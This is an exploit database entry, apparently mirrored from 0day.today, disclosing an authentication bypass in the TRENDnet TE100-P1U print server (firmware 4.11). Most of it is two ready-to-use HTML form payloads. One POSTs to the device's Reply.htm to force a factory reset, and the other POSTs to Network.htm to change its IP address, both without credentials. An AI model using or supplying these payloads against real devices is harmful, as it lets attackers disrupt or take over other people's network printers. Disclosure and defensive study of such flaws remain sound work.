Lucene search
K

TRENDnet TE100-P1U Authentication Bypass Vulnerability

🗓️ 23 Jun 2013 00:00:00Reported by ChakoType 
zdt
 zdt
🔗 0day.today👁 25 Views

TRENDnet TE100-P1U Print Server Authentication Bypas

Code
#############################################################
#
# Exploit Title: TRENDnet TE100-P1U Print Server Firmware 4.11  Authentication Bypass Vulnerability
# Date: 2013/6/20 
# Exploit Author: Chako 
# Firmware Version: 4.11
# Tested on: Windows 7
#############################################################


Description:
=====================
A remote authentication bypass vulnerability affects TRENDnet TE100-P1U Print Server. 
This issue is due to a failure of the application to validate authentication 
credentials when processing print server configuration change requests.
An attacker could reset print server to factory sttings or changeing its IP address without
password security check.

Exploit:
=====================

1)Reset Print Server To Factory Settings

<form action="http://IP/Reply.htm" method="POST">
<table border="0" cellpadding="3" cellspacing="0" width="100%">
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr><td height="50" bgcolor="#F0F0F0">&nbps;<span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br>&nbps;
<input name="Factory" value=" Yes " type="submit" width="60">
</form>



1)Change Print Server IP Address

<form action="http://IP/Network.htm" method="POST">
<table border="0" cellpadding="3" cellspacing="0" width="100%">
<tbody><tr><td class="headerbg">Change IP Address</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
 <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150">&nbps;IP Address:</td>
 <td bgcolor="#F0F0F0" valign="top">
 <table border="0">
 <tbody><tr><td>
  <input name="IP_ASSIGN" value="1" type="radio">Manually Assign
  <table border="0" cellpadding="3" cellspacing="0">
  <tbody><tr>
   <td width="20"></td><td>IP Address</td>
   <td>:&nbps;&nbps;<input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
  </tr>
  <tr>
   <td></td><td>Subnet Mask</td>
   <td>:&nbps;&nbps;<input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
  </tr>
  <tr>
   <td></td><td>Default Gateway</td>
   <td>:&nbps;&nbps;<input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
  </tr>
  </tbody></table>
</td></tr>
 
 </tbody></table>
</td>
</tr>
</tbody></table>
<table border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
 <td height="50" width="149">&nbps;</td>
 <td width="355">&nbps;<input name="Config2" value=" Save " type="submit" width="80">&nbps;&nbps;<input value="Cancel" type="reset" width="80"></td>
</tr>
</tbody></table>
</form>

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation